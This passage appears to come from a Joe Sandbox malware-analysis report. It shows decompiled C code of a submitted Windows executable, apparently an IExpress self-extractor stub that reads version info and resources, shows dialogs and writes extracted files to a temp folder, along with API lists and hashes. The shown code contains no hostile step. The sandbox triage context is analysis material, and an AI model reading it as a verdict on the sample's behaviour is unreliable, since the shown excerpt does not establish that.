                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                    										do {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00172A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00172A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x001728f1
                                                                                                                                                                                                    0x001728f4
                                                                                                                                                                                                    0x001728f7
                                                                                                                                                                                                    0x001728f9
                                                                                                                                                                                                    0x001728fc
                                                                                                                                                                                                    0x001728ff
                                                                                                                                                                                                    0x00172901
                                                                                                                                                                                                    0x00172907
                                                                                                                                                                                                    0x00172a62
                                                                                                                                                                                                    0x00172a64
                                                                                                                                                                                                    0x0017290d
                                                                                                                                                                                                    0x0017290d
                                                                                                                                                                                                    0x0017290f
                                                                                                                                                                                                    0x00172912
                                                                                                                                                                                                    0x00172920
                                                                                                                                                                                                    0x00172937
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172944
                                                                                                                                                                                                    0x0017294a
                                                                                                                                                                                                    0x0017294f
                                                                                                                                                                                                    0x00172a2f
                                                                                                                                                                                                    0x00172a32
                                                                                                                                                                                                    0x00172a34
                                                                                                                                                                                                    0x00172a37
                                                                                                                                                                                                    0x00172a41
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172955
                                                                                                                                                                                                    0x0017295e
                                                                                                                                                                                                    0x00172962
                                                                                                                                                                                                    0x00172969
                                                                                                                                                                                                    0x0017296f
                                                                                                                                                                                                    0x00172974
                                                                                                                                                                                                    0x0017298c
                                                                                                                                                                                                    0x00172a20
                                                                                                                                                                                                    0x00172a21
                                                                                                                                                                                                    0x00172a27
                                                                                                                                                                                                    0x00172a4c
                                                                                                                                                                                                    0x00172a4f
                                                                                                                                                                                                    0x00172a50
                                                                                                                                                                                                    0x00172a53
                                                                                                                                                                                                    0x00172a56
                                                                                                                                                                                                    0x00172a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001729b2
                                                                                                                                                                                                    0x001729b2
                                                                                                                                                                                                    0x001729b5
                                                                                                                                                                                                    0x001729bd
                                                                                                                                                                                                    0x001729c3
                                                                                                                                                                                                    0x001729cc
                                                                                                                                                                                                    0x001729d5
                                                                                                                                                                                                    0x001729d7
                                                                                                                                                                                                    0x001729da
                                                                                                                                                                                                    0x001729dd
                                                                                                                                                                                                    0x001729df
                                                                                                                                                                                                    0x001729ec
                                                                                                                                                                                                    0x001729f8
                                                                                                                                                                                                    0x001729fc
                                                                                                                                                                                                    0x001729ff
                                                                                                                                                                                                    0x00172a02
                                                                                                                                                                                                    0x00172a07
                                                                                                                                                                                                    0x00172a0a
                                                                                                                                                                                                    0x00172a0f
                                                                                                                                                                                                    0x00172a19
                                                                                                                                                                                                    0x00172a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172a0f
                                                                                                                                                                                                    0x0017298c
                                                                                                                                                                                                    0x00172974
                                                                                                                                                                                                    0x00172962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017294f
                                                                                                                                                                                                    0x00172912
                                                                                                                                                                                                    0x00172a65
                                                                                                                                                                                                    0x00172a68
                                                                                                                                                                                                    0x00172a6c
                                                                                                                                                                                                    0x00172a6f
                                                                                                                                                                                                    0x00172a6f
                                                                                                                                                                                                    0x00172a7d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00172A6F
                                                                                                                                                                                                      • Part of subcall function 00172773: CharUpperA.USER32(4FFA21AA,00000000,00000000,00000000), ref: 001727A8
                                                                                                                                                                                                      • Part of subcall function 00172773: CharNextA.USER32(0000054D), ref: 001727B5
                                                                                                                                                                                                      • Part of subcall function 00172773: CharNextA.USER32(00000000), ref: 001727BC
                                                                                                                                                                                                      • Part of subcall function 00172773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172829
                                                                                                                                                                                                      • Part of subcall function 00172773: RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172852
                                                                                                                                                                                                      • Part of subcall function 00172773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172870
                                                                                                                                                                                                      • Part of subcall function 00172773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001728A0
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00173938,?,?,?,?,-00000005), ref: 00172958
                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00172969
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00173938,?,?,?,?,-00000005,?), ref: 00172A21
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00172A81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                    • Opcode ID: 723e359cb014dac24d9e27c77b9eb14ae9a797418e66f75c65daa75b5f4e097a
                                                                                                                                                                                                    • Instruction ID: c29f7503b61d031b148ce7e67147258389b4747e9237d84ea0de07e63cf31bf6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723e359cb014dac24d9e27c77b9eb14ae9a797418e66f75c65daa75b5f4e097a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A510C31D00219DFCF25DF98D884AAEFBB5FF88700F14816AE919E3651D7319942DB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00174169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E0017468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E0017468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E001744B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x0017417d
                                                                                                                                                                                                    0x0017418f
                                                                                                                                                                                                    0x00174193
                                                                                                                                                                                                    0x001741b7
                                                                                                                                                                                                    0x001741d3
                                                                                                                                                                                                    0x001741e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001741e7
                                                                                                                                                                                                    0x001741d5
                                                                                                                                                                                                    0x001741d6
                                                                                                                                                                                                    0x001741d8
                                                                                                                                                                                                    0x001741d9
                                                                                                                                                                                                    0x001741da
                                                                                                                                                                                                    0x001741df
                                                                                                                                                                                                    0x001741e1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001741e1
                                                                                                                                                                                                    0x001741b9
                                                                                                                                                                                                    0x001741ba
                                                                                                                                                                                                    0x001741bc
                                                                                                                                                                                                    0x001741bd
                                                                                                                                                                                                    0x001741be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001741be
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001730B4), ref: 00174189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001730B4), ref: 001741E7
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: 3f6faa84b103c61ff8c17207fbd877293f190298ae8eba1baf218a6b4195542d
                                                                                                                                                                                                    • Instruction ID: 970a44555bce1687e409dd6769d1c2d0c5ada9ade04298364e71cce93bd23a29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6faa84b103c61ff8c17207fbd877293f190298ae8eba1baf218a6b4195542d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301F4F13402243BF32426694C96F7B21BEDFE5795F91C025B70EE15809B68DC8141B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E001719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t27 = __ebx;
                                                                                                                                                                                                    				_t11 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                    				_t34 = _a4;
                                                                                                                                                                                                    				_t14 = _a8 - 0x110;
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                    					E001743D0(_t34, _t15);
                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x179a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x001719e0
                                                                                                                                                                                                    0x001719e0
                                                                                                                                                                                                    0x001719eb
                                                                                                                                                                                                    0x001719f2
                                                                                                                                                                                                    0x001719f9
                                                                                                                                                                                                    0x001719fc
                                                                                                                                                                                                    0x00171a01
                                                                                                                                                                                                    0x00171a2a
                                                                                                                                                                                                    0x00171a2e
                                                                                                                                                                                                    0x00171a3e
                                                                                                                                                                                                    0x00171a4f
                                                                                                                                                                                                    0x00171a62
                                                                                                                                                                                                    0x00171a6a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171a03
                                                                                                                                                                                                    0x00171a06
                                                                                                                                                                                                    0x00171a20
                                                                                                                                                                                                    0x00171a20
                                                                                                                                                                                                    0x00171a08
                                                                                                                                                                                                    0x00171a08
                                                                                                                                                                                                    0x00171a14
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171a16
                                                                                                                                                                                                    0x00171a18
                                                                                                                                                                                                    0x00171a70
                                                                                                                                                                                                    0x00171a72
                                                                                                                                                                                                    0x00171a72
                                                                                                                                                                                                    0x00171a14
                                                                                                                                                                                                    0x00171a06
                                                                                                                                                                                                    0x00171a81

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00171A18
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00171A24
                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00171A4F
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00171A62
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00171A6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                    • Opcode ID: 38784b94e4e9e3acc735743b437eac10c331ce6348b73412aa508de7bf4104e2
                                                                                                                                                                                                    • Instruction ID: e0e99fbda5b0c1001da000561399de6c03902d0450dd548985e8780e0fac0155
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38784b94e4e9e3acc735743b437eac10c331ce6348b73412aa508de7bf4104e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211A131501159AFEB10EF68DD08AAE77B8EF89301F908164F91A97590DB309EC1CB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E001763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				long _v272;
                                                                                                                                                                                                    				void* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                    				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_v276 = _a16;
                                                                                                                                                                                                    				_t37 = 1;
                                                                                                                                                                                                    				E00171781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    				E0017658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                    				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                    					_t28 = _a4;
                                                                                                                                                                                                    					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                    						 *0x179124 = 0x80070052;
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					CloseHandle(_t39);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *0x179124 = 0x80070052;
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x001763cb
                                                                                                                                                                                                    0x001763d2
                                                                                                                                                                                                    0x001763d8
                                                                                                                                                                                                    0x001763ea
                                                                                                                                                                                                    0x001763f3
                                                                                                                                                                                                    0x00176401
                                                                                                                                                                                                    0x00176402
                                                                                                                                                                                                    0x00176410
                                                                                                                                                                                                    0x00176415
                                                                                                                                                                                                    0x00176433
                                                                                                                                                                                                    0x00176438
                                                                                                                                                                                                    0x00176449
                                                                                                                                                                                                    0x00176463
                                                                                                                                                                                                    0x0017646d
                                                                                                                                                                                                    0x00176477
                                                                                                                                                                                                    0x00176477
                                                                                                                                                                                                    0x0017647a
                                                                                                                                                                                                    0x0017643a
                                                                                                                                                                                                    0x0017643a
                                                                                                                                                                                                    0x00176444
                                                                                                                                                                                                    0x00176444
                                                                                                                                                                                                    0x00176492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 001763EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-2312194364
                                                                                                                                                                                                    • Opcode ID: 2ebdc28f70baf3e275527dd26cc7c24ceaf1d113c13eb15f615173a71e97e2a0
                                                                                                                                                                                                    • Instruction ID: 32107deb5b116031b83489e576d9d22c1a6b79727e4bb522a0145bfc3892da1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebdc28f70baf3e275527dd26cc7c24ceaf1d113c13eb15f615173a71e97e2a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3821D571A00218ABDB10DF25DC85FEB7778EB98314F0081A9F589A3180DBB05DC58F64
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001747E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00171680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0x1791e0; // 0x33c7230
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0x1791e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0x178584; // 0x0
                                                                                                                                                                                                    					E001744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0x178584; // 0x0
                                                                                                                                                                                                    				E001744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x001747e8
                                                                                                                                                                                                    0x001747f0
                                                                                                                                                                                                    0x001747f4
                                                                                                                                                                                                    0x0017480f
                                                                                                                                                                                                    0x00174811
                                                                                                                                                                                                    0x00174814
                                                                                                                                                                                                    0x00174814
                                                                                                                                                                                                    0x00174816
                                                                                                                                                                                                    0x00174817
                                                                                                                                                                                                    0x00174829
                                                                                                                                                                                                    0x0017482b
                                                                                                                                                                                                    0x0017482f
                                                                                                                                                                                                    0x0017484f
                                                                                                                                                                                                    0x00174852
                                                                                                                                                                                                    0x00174855
